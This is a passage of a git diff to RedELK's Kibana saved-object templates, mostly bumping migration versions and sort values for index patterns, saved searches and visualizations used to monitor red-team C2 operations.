"infra.attack_scenario", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "infra.attack_scenario.keyword", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "subType": { + "multi": { + "parent": "infra.attack_scenario" + } + }, + "type": "string" + }, + { + "aggregatable": false, + "count": 0, + "esTypes": [ + "text" + ], + "name": "message", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "message.keyword", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "subType": { + "multi": { + "parent": "message" + } + }, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "text", + "keyword" + ], + "name": "path", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "path.keyword", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "subType": { + "multi": { + "parent": "path" + } + }, + "type": "string" + }, + { + "aggregatable": false, + "count": 0, + "esTypes": [ + "text" + ], + "name": "pstools.psx.edr_name", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "pstools.psx.edr_name.keyword", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "subType": { + "multi": { + "parent": "pstools.psx.edr_name" + } + }, + "type": "string" + }, + { + "aggregatable": false, + "count": 0, + "esTypes": [ + "text" + ], + "name": "pstools.psx.security_products", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "pstools.psx.security_products.keyword", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "subType": { + "multi": { + "parent": "pstools.psx.security_products" + } + }, + "type": "string" + }, + { + "aggregatable": false, + "count": 0, + "esTypes": [ + "text" + ], + "name": "pstools.tool", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "pstools.tool.keyword", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "subType": { + "multi": { + "parent": "pstools.tool" + } + }, + "type": "string" + }, + { + "aggregatable": false, + "count": 0, + "esTypes": [ + "text" + ], + "name": "results", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "results.keyword", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "subType": { + "multi": { + "parent": "results" + } + }, + "type": "string" + }, + { + "aggregatable": false, + "count": 0, + "esTypes": [ + "text" + ], + "name": "tags", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "tags.keyword", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "subType": { + "multi": { + "parent": "tags" + } + }, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "text", + "keyword" + ], + "name": "type", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "type.keyword", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "subType": { + "multi": { + "parent": "type" + } + }, + "type": "string" + } + ], "timeFieldName": "@timestamp", - "title": "bluecheck-*", - "typeMeta": "{}" + "title": "bluecheck-*" }, - "coreMigrationVersion": "7.16.3", - "id": "972368b0-7b90-11ec-9471-7f985bde469d", + "coreMigrationVersion": "7.16.2", + "id": "bluecheck", "migrationVersion": { "index-pattern": "7.11.0" }, "references": [], "sort": [ - 1644504089054, - 308 + 1642152837408, + 1663 ], "type": "index-pattern", "version": "1" diff --git a/elkserver/docker/redelk-base/redelkinstalldata/templates/diff/redelk_kibana_index-pattern_credentials.json b/elkserver/docker/redelk-base/redelkinstalldata/templates/diff/redelk_kibana_index-pattern_credentials.json index 31b65195..ff38d6f3 100644 --- a/elkserver/docker/redelk-base/redelkinstalldata/templates/diff/redelk_kibana_index-pattern_credentials.json +++ b/elkserver/docker/redelk-base/redelkinstalldata/templates/diff/redelk_kibana_index-pattern_credentials.json @@ -870,15 +870,15 @@ "timeFieldName": "@timestamp", "title": "credentials-*" }, - "coreMigrationVersion": "7.16.3", + "coreMigrationVersion": "7.16.2", "id": "credentials", "migrationVersion": { "index-pattern": "7.11.0" }, "references": [], "sort": [ - 1642171858664, - 19 + 1642152839362, + 1858 ], "type": "index-pattern", "version": "1" diff --git a/elkserver/docker/redelk-base/redelkinstalldata/templates/diff/redelk_kibana_index-pattern_email.json b/elkserver/docker/redelk-base/redelkinstalldata/templates/diff/redelk_kibana_index-pattern_email.json index c715ea9e..8e667549 100644 --- a/elkserver/docker/redelk-base/redelkinstalldata/templates/diff/redelk_kibana_index-pattern_email.json +++ b/elkserver/docker/redelk-base/redelkinstalldata/templates/diff/redelk_kibana_index-pattern_email.json @@ -2826,15 +2826,15 @@ "timeFieldName": "@timestamp", "title": "email-*" }, - "coreMigrationVersion": "7.16.3", + "coreMigrationVersion": "7.16.2", "id": "email", "migrationVersion": { "index-pattern": "7.11.0" }, "references": [], "sort": [ - 1642171860673, - 15 + 1642152841336, + 1866 ], "type": "index-pattern", "version": "1" diff --git a/elkserver/docker/redelk-base/redelkinstalldata/templates/diff/redelk_kibana_index-pattern_implantsdb.json b/elkserver/docker/redelk-base/redelkinstalldata/templates/diff/redelk_kibana_index-pattern_implantsdb.json index b8741e1c..ce84b5d6 100644 --- a/elkserver/docker/redelk-base/redelkinstalldata/templates/diff/redelk_kibana_index-pattern_implantsdb.json +++ b/elkserver/docker/redelk-base/redelkinstalldata/templates/diff/redelk_kibana_index-pattern_implantsdb.json @@ -1879,15 +1879,15 @@ ], "title": "implantsdb" }, - "coreMigrationVersion": "7.16.3", + "coreMigrationVersion": "7.16.2", "id": "implantsdb", "migrationVersion": { "index-pattern": "7.11.0" }, "references": [], "sort": [ - 1642171862691, - 16 + 1642152843417, + 1817 ], "type": "index-pattern", "version": "1" diff --git a/elkserver/docker/redelk-base/redelkinstalldata/templates/diff/redelk_kibana_index-pattern_redelk.json b/elkserver/docker/redelk-base/redelkinstalldata/templates/diff/redelk_kibana_index-pattern_redelk.json index 361fd12c..fa3cbb31 100644 --- a/elkserver/docker/redelk-base/redelkinstalldata/templates/diff/redelk_kibana_index-pattern_redelk.json +++ b/elkserver/docker/redelk-base/redelkinstalldata/templates/diff/redelk_kibana_index-pattern_redelk.json @@ -206,15 +206,15 @@ ], "title": "redelk-*" }, - "coreMigrationVersion": "7.16.3", + "coreMigrationVersion": "7.16.2", "id": "b5972620-2b72-11eb-85d7-bbc5b6917d13", "migrationVersion": { "index-pattern": "7.11.0" }, "references": [], "sort": [ - 1642171866710, - 20 + 1642152847512, + 1890 ], "type": "index-pattern", "version": "1" diff --git a/elkserver/docker/redelk-base/redelkinstalldata/templates/diff/redelk_kibana_index-pattern_redirtraffic.json b/elkserver/docker/redelk-base/redelkinstalldata/templates/diff/redelk_kibana_index-pattern_redirtraffic.json index 8cdcaafd..57cd28d5 100644 --- a/elkserver/docker/redelk-base/redelkinstalldata/templates/diff/redelk_kibana_index-pattern_redirtraffic.json +++ b/elkserver/docker/redelk-base/redelkinstalldata/templates/diff/redelk_kibana_index-pattern_redirtraffic.json @@ -9,15 +9,15 @@ "title": "redirtraffic-*", "typeMeta": "{}" }, - "coreMigrationVersion": "7.16.3", + "coreMigrationVersion": "7.16.2", "id": "redirtraffic", "migrationVersion": { "index-pattern": "7.11.0" }, "references": [], "sort": [ - 1642171868723, - 243 + 1642154954544, + 16181 ], "type": "index-pattern", "version": "1" diff --git a/elkserver/docker/redelk-base/redelkinstalldata/templates/diff/redelk_kibana_index-pattern_rtops.json b/elkserver/docker/redelk-base/redelkinstalldata/templates/diff/redelk_kibana_index-pattern_rtops.json index 0386f52d..2295571b 100644 --- a/elkserver/docker/redelk-base/redelkinstalldata/templates/diff/redelk_kibana_index-pattern_rtops.json +++ b/elkserver/docker/redelk-base/redelkinstalldata/templates/diff/redelk_kibana_index-pattern_rtops.json @@ -9,15 +9,15 @@ "title": "rtops-*", "typeMeta": "{}" }, - "coreMigrationVersion": "7.16.3", + "coreMigrationVersion": "7.16.2", "id": "rtops", "migrationVersion": { "index-pattern": "7.11.0" }, "references": [], "sort": [ - 1642171870762, - 242 + 1642157817846, + 34863 ], "type": "index-pattern", "version": "1" diff --git a/elkserver/docker/redelk-base/redelkinstalldata/templates/diff/redelk_kibana_search.json b/elkserver/docker/redelk-base/redelkinstalldata/templates/diff/redelk_kibana_search.json index 31cf5e1f..44f05722 100644 --- a/elkserver/docker/redelk-base/redelkinstalldata/templates/diff/redelk_kibana_search.json +++ b/elkserver/docker/redelk-base/redelkinstalldata/templates/diff/redelk_kibana_search.json @@ -33,7 +33,7 @@ "title": "RedELK - _Redirector Traffic", "version": 1 }, - "coreMigrationVersion": "7.16.3", + "coreMigrationVersion": "7.16.2", "id": "0f7dcd70-b982-11e8-94dd-171ae5c1fd1a", "migrationVersion": { "search": "7.9.3" @@ -46,8 +46,8 @@ } ], "sort": [ - 1642171874859, - 198 + 1642152855820, + 2152 ], "type": "search", "version": "1" @@ -112,7 +112,7 @@ "title": "RedELK - C2 IOCs - Alarmed", "version": 1 }, - "coreMigrationVersion": "7.16.3", + "coreMigrationVersion": "7.16.2", "id": "10da2290-d4e2-11ea-9301-a30a04251ae9", "migrationVersion": { "search": "7.9.3" @@ -130,8 +130,8 @@ } ], "sort": [ - 1642171874859, - 201 + 1642152855820, + 2155 ], "type": "search", "version": "1" @@ -294,7 +294,7 @@ "title": "RedELK - _Red Team Operations", "version": 1 }, - "coreMigrationVersion": "7.16.3", + "coreMigrationVersion": "7.16.2", "id": "1c580960-b6a9-11e8-bc1a-cf8fa3255855", "migrationVersion": { "search": "7.9.3" @@ -337,8 +337,8 @@ } ], "sort": [ - 1642171874859, - 209 + 1642152855820, + 2163 ], "type": "search", "version": "1" @@ -403,7 +403,7 @@ "title": "RedELK - C2 Downloads", "version": 1 }, - "coreMigrationVersion": "7.16.3", + "coreMigrationVersion": "7.16.2", "id": "26ba4cb0-0f73-11e9-8e1e-a16db980e11e", "migrationVersion": { "search": "7.9.3" @@ -421,8 +421,8 @@ } ], "sort": [ - 1642171874859, - 212 + 1642152855820, + 2166 ], "type": "search", "version": "1" @@ -484,7 +484,7 @@ "title": "RedELK - C2 Keystrokes", "version": 1 }, - "coreMigrationVersion": "7.16.3", + "coreMigrationVersion": "7.16.2", "id": "3afbdbc0-b6aa-11e8-bc1a-cf8fa3255855", "migrationVersion": { "search": "7.9.3" @@ -502,8 +502,8 @@ } ], "sort": [ - 1642171874859, - 215 + 1642152855820, + 2169 ], "type": "search", "version": "1" @@ -540,7 +540,7 @@ "title": "RedELK - C2 Credentials", "version": 1 }, - "coreMigrationVersion": "7.16.3", + "coreMigrationVersion": "7.16.2", "id": "3fabe620-6c38-11ea-97d6-55783aed877a", "migrationVersion": { "search": "7.9.3" @@ -553,8 +553,8 @@ } ], "sort": [ - 1642171874859, - 217 + 1642152855820, + 2171 ], "type": "search", "version": "1" @@ -619,7 +619,7 @@ "title": "RedELK - C2 IOCs", "version": 1 }, - "coreMigrationVersion": "7.16.3", + "coreMigrationVersion": "7.16.2", "id": "4c003e20-b6aa-11e8-bc1a-cf8fa3255855", "migrationVersion": { "search": "7.9.3" @@ -637,8 +637,8 @@ } ], "sort": [ - 1642171874859, - 220 + 1642152855820, + 2174 ], "type": "search", "version": "1" @@ -689,7 +689,7 @@ "title": "RedELK - Modules status", "version": 1 }, - "coreMigrationVersion": "7.16.3", + "coreMigrationVersion": "7.16.2", "id": "654f76a0-9269-11eb-a753-9da683898c26", "migrationVersion": { "search": "7.9.3" @@ -707,8 +707,8 @@ } ], "sort": [ - 1642171874859, - 223 + 1642152855820, + 2177 ], "type": "search", "version": "1" @@ -747,7 +747,7 @@ "title": "RedELK - Redirector Traffic - Alarmed", "version": 1 }, - "coreMigrationVersion": "7.16.3", + "coreMigrationVersion": "7.16.2", "id": "658d7180-d4e1-11ea-9301-a30a04251ae9", "migrationVersion": { "search": "7.9.3" @@ -760,8 +760,8 @@ } ], "sort": [ - 1642171874859, - 225 + 1642152855820, + 2179 ], "type": "search", "version": "1" @@ -806,7 +806,7 @@ "title": "RedELK - C2 implants overview", "version": 1 }, - "coreMigrationVersion": "7.16.3", + "coreMigrationVersion": "7.16.2", "id": "68e8e870-b6aa-11e8-bc1a-cf8fa3255855", "migrationVersion": { "search": "7.9.3" @@ -819,8 +819,8 @@ } ], "sort": [ - 1642171874859, - 227 + 1642152855820, + 2181 ], "type": "search", "version": "1" @@ -850,7 +850,7 @@ "title": "RedELK - IP Lists", "version": 1 }, - "coreMigrationVersion": "7.16.3", + "coreMigrationVersion": "7.16.2", "id": "87530b40-9269-11eb-a753-9da683898c26", "migrationVersion": { "search": "7.9.3" @@ -863,8 +863,8 @@ } ], "sort": [ - 1642171874859, - 229 + 1642152855820, + 2183 ], "type": "search", "version": "1" @@ -898,7 +898,7 @@ "title": "RedELK - BlueCheck", "version": 1 }, - "coreMigrationVersion": "7.16.3", + "coreMigrationVersion": "7.16.2", "id": "a4757c90-ce50-11ea-a580-918d4757c08d", "migrationVersion": { "search": "7.9.3" @@ -911,8 +911,8 @@ } ], "sort": [ - 1643015939090, - 281 + 1642152855820, + 2185 ], "type": "search", "version": "1" @@ -944,7 +944,7 @@ "title": "RedELK - Emails", "version": 1 }, - "coreMigrationVersion": "7.16.3", + "coreMigrationVersion": "7.16.2", "id": "c1fca0d0-d171-11ea-8ac3-bfcfabda2250", "migrationVersion": { "search": "7.9.3" @@ -957,8 +957,8 @@ } ], "sort": [ - 1642171874859, - 231 + 1642152855820, + 2187 ], "type": "search", "version": "1" @@ -1011,7 +1011,7 @@ "title": "RedELK - C2 Tasks", "version": 1 }, - "coreMigrationVersion": "7.16.3", + "coreMigrationVersion": "7.16.2", "id": "cc523820-d021-11ea-9301-a30a04251ae9", "migrationVersion": { "search": "7.9.3" @@ -1029,8 +1029,8 @@ } ], "sort": [ - 1642171874859, - 234 + 1642152855820, + 2190 ], "type": "search", "version": "1" @@ -1083,7 +1083,7 @@ "title": "RedELK - Signals", "version": 1 }, - "coreMigrationVersion": "7.16.3", + "coreMigrationVersion": "7.16.2", "id": "dddbba20-d04f-11ea-9301-a30a04251ae9", "migrationVersion": { "search": "7.9.3" @@ -1101,8 +1101,8 @@ } ], "sort": [ - 1642171874859, - 237 + 1642152855820, + 2193 ], "type": "search", "version": "1" @@ -1161,7 +1161,7 @@ "title": "RedELK - C2 Screenshots", "version": 1 }, - "coreMigrationVersion": "7.16.3", + "coreMigrationVersion": "7.16.2", "id": "e8de79f0-b6aa-11e8-bc1a-cf8fa3255855", "migrationVersion": { "search": "7.9.3" @@ -1179,8 +1179,8 @@ } ], "sort": [ - 1642171874859, - 240 + 1642152855820, + 2196 ], "type": "search", "version": "1" diff --git a/elkserver/docker/redelk-base/redelkinstalldata/templates/diff/redelk_kibana_visualization.json b/elkserver/docker/redelk-base/redelkinstalldata/templates/diff/redelk_kibana_visualization.json index 7b198e16..14d2756d 100644 --- a/elkserver/docker/redelk-base/redelkinstalldata/templates/diff/redelk_kibana_visualization.json +++ b/elkserver/docker/redelk-base/redelkinstalldata/templates/diff/redelk_kibana_visualization.json @@ -149,7 +149,7 @@ "type": "histogram" } }, - "coreMigrationVersion": "7.16.3", + "coreMigrationVersion": "7.16.2", "id": "057076f0-d4e4-11ea-9301-a30a04251ae9", "migrationVersion": { "visualization": "7.14.0" @@ -162,8 +162,8 @@ } ], "sort": [ - 1642171875895, - 99 + 1642152856829, + 2209 ], "type": "visualization", "version": "1" @@ -303,7 +303,7 @@ "type": "histogram" } }, - "coreMigrationVersion": "7.16.3", + "coreMigrationVersion": "7.16.2", "id": "0b5ffcd0-d317-11ea-9301-a30a04251ae9", "migrationVersion": { "visualization": "7.14.0" @@ -316,8 +316,8 @@ } ], "sort": [ - 1642171875895, - 101 + 1642152856829, + 2211 ], "type": "visualization", "version": "1" @@ -348,15 +348,15 @@ "type": "markdown" } }, - "coreMigrationVersion": "7.16.3", + "coreMigrationVersion": "7.16.2", "id": "0f82b540-d237-11ea-9301-a30a04251ae9", "migrationVersion": { "visualization": "7.14.0" }, "references": [], "sort": [ - 1642171875895, - 102 + 1642152856829, + 2212 ], "type": "visualization", "version": "1" @@ -467,7 +467,7 @@ "type": "pie" } }, - "coreMigrationVersion": "7.16.3", + "coreMigrationVersion": "7.16.2", "id": "10dcc4a0-b8e7-11e8-94dd-171ae5c1fd1a", "migrationVersion": { "visualization": "7.14.0" @@ -485,8 +485,8 @@ } ], "sort": [ - 1642171875895, - 105 + 1642152856829, + 2215 ], "type": "visualization", "version": "1" @@ -577,7 +577,7 @@ "type": "tile_map" } }, - "coreMigrationVersion": "7.16.3", + "coreMigrationVersion": "7.16.2", "id": "10dd40f0-b983-11e8-94dd-171ae5c1fd1a", "migrationVersion": { "visualization": "7.14.0" @@ -590,8 +590,8 @@ } ], "sort": [ - 1642171875895, - 107 + 1642152856829, + 2217 ], "type": "visualization", "version": "1" @@ -682,7 +682,7 @@ "type": "tile_map" } }, - "coreMigrationVersion": "7.16.3", + "coreMigrationVersion": "7.16.2", "id": "1d26da60-b983-11e8-94dd-171ae5c1fd1a", "migrationVersion": { "visualization": "7.14.0" @@ -695,8 +695,8 @@ } ], "sort": [ - 1642171875895, - 109 + 1642152856829, + 2219 ], "type": "visualization", "version": "1" @@ -777,7 +777,7 @@ "type": "metric" } }, - "coreMigrationVersion": "7.16.3", + "coreMigrationVersion": "7.16.2", "id": "20fac240-926c-11eb-a753-9da683898c26", "migrationVersion": { "visualization": "7.14.0" @@ -790,8 +790,8 @@ } ], "sort": [ - 1642171875895, - 111 + 1642152856829, + 2221 ], "type": "visualization", "version": "1" @@ -945,7 +945,7 @@ "type": "histogram" } }, - "coreMigrationVersion": "7.16.3", + "coreMigrationVersion": "7.16.2", "id": "231792d0-d050-11ea-9301-a30a04251ae9", "migrationVersion": { "visualization": "7.14.0" @@ -958,8 +958,8 @@ } ], "sort": [ - 1642171875895, - 113 + 1642152856829, + 2223 ], "type": "visualization", "version": "1" @@ -1113,7 +1113,7 @@ "type": "histogram" } }, - "coreMigrationVersion": "7.16.3", + "coreMigrationVersion": "7.16.2", "id": "2f5a2760-d050-11ea-9301-a30a04251ae9", "migrationVersion": { "visualization": "7.14.0" @@ -1126,8 +1126,8 @@ } ], "sort": [ - 1642171875895, - 115 + 1642152856829, + 2225 ], "type": "visualization", "version": "1" @@ -1212,7 +1212,7 @@ "type": "pie" } }, - "coreMigrationVersion": "7.16.3", + "coreMigrationVersion": "7.16.2", "id": "2f77a150-926a-11eb-a753-9da683898c26", "migrationVersion": { "visualization": "7.14.0" @@ -1225,8 +1225,8 @@ } ], "sort": [ - 1642171875895, - 117 + 1642152856829, + 2227 ], "type": "visualization", "version": "1" @@ -1314,7 +1314,7 @@ "type": "pie" } }, - "coreMigrationVersion": "7.16.3", + "coreMigrationVersion": "7.16.2", "id": "2f971ac0-926b-11eb-a753-9da683898c26", "migrationVersion": { "visualization": "7.14.0" @@ -1327,8 +1327,8 @@ } ], "sort": [ - 1642171875895, - 119 + 1642152856829, + 2229 ], "type": "visualization", "version": "1" @@ -1393,7 +1393,7 @@ "type": "tagcloud" } }, - "coreMigrationVersion": "7.16.3", + "coreMigrationVersion": "7.16.2", "id": "3729cde0-d4e4-11ea-9301-a30a04251ae9", "migrationVersion": { "visualization": "7.14.0" @@ -1406,8 +1406,8 @@ } ], "sort": [ - 1642171875895, - 121 + 1642152856829, + 2231 ], "type": "visualization", "version": "1" @@ -1472,7 +1472,7 @@ "type": "metric" } }, - "coreMigrationVersion": "7.16.3", + "coreMigrationVersion": "7.16.2", "id": "389dddc0-d317-11ea-9301-a30a04251ae9", "migrationVersion": { "visualization": "7.14.0" @@ -1485,8 +1485,8 @@ } ], "sort": [ - 1642171875895, - 123 + 1642152856829, + 2233 ], "type": "visualization", "version": "1" @@ -1626,7 +1626,7 @@ "type": "histogram" } }, - "coreMigrationVersion": "7.16.3", + "coreMigrationVersion": "7.16.2", "id": "3ae6c0c0-d4e2-11ea-9301-a30a04251ae9", "migrationVersion": { "visualization": "7.14.0" @@ -1639,8 +1639,8 @@ } ], "sort": [ - 1642171875895, - 125 + 1642152856829, + 2235 ], "type": "visualization", "version": "1" @@ -1703,7 +1703,7 @@ "type": "tagcloud" } }, - "coreMigrationVersion": "7.16.3", + "coreMigrationVersion": "7.16.2", "id": "41f94ad0-d04c-11ea-9301-a30a04251ae9", "migrationVersion": { "visualization": "7.14.0" @@ -1716,8 +1716,8 @@ } ], "sort": [ - 1642171875895, - 127 + 1642152856829, + 2237 ], "type": "visualization", "version": "1" @@ -1748,15 +1748,15 @@ "type": "markdown" } }, - "coreMigrationVersion": "7.16.3", + "coreMigrationVersion": "7.16.2", "id": "45491770-0886-11eb-a2d2-171dc8941414", "migrationVersion": { "visualization": "7.14.0" }, "references": [], "sort": [ - 1642171875895, - 128 + 1642152856829, + 2238 ], "type": "visualization", "version": "1" @@ -1822,7 +1822,7 @@ "type": "metric" } }, - "coreMigrationVersion": "7.16.3", + "coreMigrationVersion": "7.16.2", "id": "464660c0-d360-11ea-9301-a30a04251ae9", "migrationVersion": { "visualization": "7.14.0" @@ -1835,8 +1835,8 @@ } ], "sort": [ - 1642171875895, - 130 + 1642152856829, + 2240 ], "type": "visualization", "version": "1" @@ -1929,7 +1929,7 @@ "type": "input_control_vis" } }, - "coreMigrationVersion": "7.16.3", + "coreMigrationVersion": "7.16.2", "id": "56350050-efe7-11eb-8a9f-2572da287875", "migrationVersion": { "visualization": "7.14.0" @@ -1957,8 +1957,8 @@ } ], "sort": [ - 1642171875895, - 135 + 1642152856829, + 2245 ], "type": "visualization", "version": "1" @@ -2023,7 +2023,7 @@ "type": "metric" } }, - "coreMigrationVersion": "7.16.3", + "coreMigrationVersion": "7.16.2", "id": "57626ad0-d355-11ea-9301-a30a04251ae9", "migrationVersion": { "visualization": "7.14.0" @@ -2036,8 +2036,8 @@ } ], "sort": [ - 1642171875895, - 137 + 1642152856829, + 2247 ], "type": "visualization", "version": "1" @@ -2102,7 +2102,7 @@ "type": "metric" } }, - "coreMigrationVersion": "7.16.3", + "coreMigrationVersion": "7.16.2", "id": "5ffe8850-d4e4-11ea-9301-a30a04251ae9", "migrationVersion": { "visualization": "7.14.0" @@ -2115,8 +2115,8 @@ } ], "sort": [ - 1642171875895, - 139 + 1642152856829, + 2249 ], "type": "visualization", "version": "1" @@ -2182,7 +2182,7 @@ "type": "metric" } }, - "coreMigrationVersion": "7.16.3", + "coreMigrationVersion": "7.16.2", "id": "62b61920-d4e2-11ea-9301-a30a04251ae9", "migrationVersion": { "visualization": "7.14.0" @@ -2195,8 +2195,8 @@ } ], "sort": [ - 1642171875895, - 141 + 1642152856829, + 2251 ], "type": "visualization", "version": "1" @@ -2265,7 +2265,7 @@ "type": "pie" } }, - "coreMigrationVersion": "7.16.3", + "coreMigrationVersion": "7.16.2", "id": "632081a0-d02a-11ea-9301-a30a04251ae9", "migrationVersion": { "visualization": "7.14.0" @@ -2278,8 +2278,8 @@ } ], "sort": [ - 1642171875895, - 143 + 1642152856829, + 2253 ], "type": "visualization", "version": "1" @@ -2341,7 +2341,7 @@ "type": "tagcloud" } }, - "coreMigrationVersion": "7.16.3", + "coreMigrationVersion": "7.16.2", "id": "659280b0-d317-11ea-9301-a30a04251ae9", "migrationVersion": { "visualization": "7.14.0" @@ -2354,8 +2354,8 @@ } ], "sort": [ - 1642171875895, - 145 + 1642152856829, + 2255 ], "type": "visualization", "version": "1" @@ -2424,7 +2424,7 @@ "type": "pie" } }, - "coreMigrationVersion": "7.16.3", + "coreMigrationVersion": "7.16.2", "id": "6fcf1e70-d02a-11ea-9301-a30a04251ae9", "migrationVersion": { "visualization": "7.14.0" @@ -2437,8 +2437,8 @@ } ], "sort": [ - 1642171875895, - 147 + 1642152856829, + 2257 ], "type": "visualization", "version": "1" @@ -2503,7 +2503,7 @@ "type": "metric" } }, - "coreMigrationVersion": "7.16.3", + "coreMigrationVersion": "7.16.2", "id": "7d850b30-d4e2-11ea-9301-a30a04251ae9", "migrationVersion": { "visualization": "7.14.0" @@ -2516,8 +2516,8 @@ } ], "sort": [ - 1642171875895, - 149 + 1642152856829, + 2259 ], "type": "visualization", "version": "1" @@ -2659,7 +2659,7 @@ "type": "histogram" } }, - "coreMigrationVersion": "7.16.3", + "coreMigrationVersion": "7.16.2", "id": "85446c80-d04b-11ea-9301-a30a04251ae9", "migrationVersion": { "visualization": "7.14.0" @@ -2672,8 +2672,8 @@ } ], "sort": [ - 1642171875895, - 151 + 1642152856829, + 2261 ], "type": "visualization", "version": "1" @@ -2784,7 +2784,7 @@ "type": "pie" } }, - "coreMigrationVersion": "7.16.3", + "coreMigrationVersion": "7.16.2", "id": "88003df0-b8ec-11e8-94dd-171ae5c1fd1a", "migrationVersion": { "visualization": "7.14.0" @@ -2802,8 +2802,8 @@ } ], "sort": [ - 1642171875895, - 154 + 1642152856829, + 2264 ], "type": "visualization", "version": "1" @@ -2868,7 +2868,7 @@ "type": "tagcloud" } }, - "coreMigrationVersion": "7.16.3", + "coreMigrationVersion": "7.16.2", "id": "88db1280-d024-11ea-9301-a30a04251ae9", "migrationVersion": { "visualization": "7.14.0" @@ -2881,8 +2881,8 @@ } ], "sort": [ - 1642171875895, - 156 + 1642152856829, + 2266 ], "type": "visualization", "version": "1" @@ -2951,7 +2951,7 @@ "type": "pie" } }, - "coreMigrationVersion": "7.16.3", + "coreMigrationVersion": "7.16.2", "id": "a1efc620-b8e4-11e8-94dd-171ae5c1fd1a", "migrationVersion": { "visualization": "7.14.0" @@ -2964,8 +2964,8 @@ } ], "sort": [ - 1642171875895, - 158 + 1642152856829, + 2268 ], "type": "visualization", "version": "1" @@ -3050,7 +3050,7 @@ "type": "pie" } }, - "coreMigrationVersion": "7.16.3", + "coreMigrationVersion": "7.16.2", "id": "a5554e20-d025-11ea-9301-a30a04251ae9", "migrationVersion": { "visualization": "7.14.0" @@ -3063,8 +3063,8 @@ } ], "sort": [ - 1642171875895, - 160 + 1642152856829, + 2270 ], "type": "visualization", "version": "1" @@ -3204,7 +3204,7 @@ "type": "histogram" } }, - "coreMigrationVersion": "7.16.3", + "coreMigrationVersion": "7.16.2", "id": "ab609c60-d319-11ea-9301-a30a04251ae9", "migrationVersion": { "visualization": "7.14.0" @@ -3217,8 +3217,8 @@ } ], "sort": [ - 1642171875895, - 162 + 1642152856829, + 2272 ], "type": "visualization", "version": "1" @@ -3280,7 +3280,7 @@ "type": "tagcloud" } }, - "coreMigrationVersion": "7.16.3", + "coreMigrationVersion": "7.16.2", "id": "abdcd940-d050-11ea-9301-a30a04251ae9", "migrationVersion": { "visualization": "7.14.0" @@ -3293,8 +3293,8 @@ } ], "sort": [ - 1642171875895, - 164 + 1642152856829, + 2274 ], "type": "visualization", "version": "1" @@ -3450,7 +3450,7 @@ "type": "histogram" } }, - "coreMigrationVersion": "7.16.3", + "coreMigrationVersion": "7.16.2", "id": "afb6ce00-d022-11ea-9301-a30a04251ae9", "migrationVersion": { "visualization": "7.14.0" @@ -3463,8 +3463,8 @@ } ], "sort": [ - 1642171875895, - 166 + 1642152856829, + 2276 ], "type": "visualization", "version": "1" @@ -3530,7 +3530,7 @@ "type": "metric" } }, - "coreMigrationVersion": "7.16.3", + "coreMigrationVersion": "7.16.2", "id": "b19d4790-d35f-11ea-9301-a30a04251ae9", "migrationVersion": { "visualization": "7.14.0" @@ -3543,8 +3543,8 @@ } ], "sort": [ - 1642171875895, - 168 + 1642152856829, + 2278 ], "type": "visualization", "version": "1" @@ -3609,7 +3609,7 @@ "type": "metric" } }, - "coreMigrationVersion": "7.16.3", + "coreMigrationVersion": "7.16.2", "id": "b5beb3c0-d04b-11ea-9301-a30a04251ae9", "migrationVersion": { "visualization": "7.14.0" @@ -3622,8 +3622,8 @@ } ], "sort": [ - 1642171875895, - 170 + 1642152856829, + 2280 ], "type": "visualization", "version": "1" @@ -3799,7 +3799,7 @@ "type": "line" } }, - "coreMigrationVersion": "7.16.3", + "coreMigrationVersion": "7.16.2", "id": "be08d380-efe9-11eb-8a9f-2572da287875", "migrationVersion": { "visualization": "7.14.0" @@ -3812,8 +3812,8 @@ } ], "sort": [ - 1642171875895, - 172 + 1642152856829, + 2282 ], "type": "visualization", "version": "1" @@ -3914,7 +3914,7 @@ "type": "table" } }, - "coreMigrationVersion": "7.16.3", + "coreMigrationVersion": "7.16.2", "id": "cbb7d710-efee-11eb-8a9f-2572da287875", "migrationVersion": { "visualization": "7.14.0" @@ -3927,8 +3927,8 @@ } ], "sort": [ - 1642171875895, - 174 + 1642152856829, + 2284 ], "type": "visualization", "version": "1" @@ -4004,7 +4004,7 @@ "type": "metric" } }, - "coreMigrationVersion": "7.16.3", + "coreMigrationVersion": "7.16.2", "id": "ce581930-d361-11ea-9301-a30a04251ae9", "migrationVersion": { "visualization": "7.14.0" @@ -4017,8 +4017,8 @@ } ], "sort": [ - 1642171875895, - 176 + 1642152856829, + 2286 ], "type": "visualization", "version": "1" @@ -4081,7 +4081,7 @@ "type": "input_control_vis" } }, - "coreMigrationVersion": "7.16.3", + "coreMigrationVersion": "7.16.2", "id": "d2c7b720-d026-11ea-9301-a30a04251ae9", "migrationVersion": { 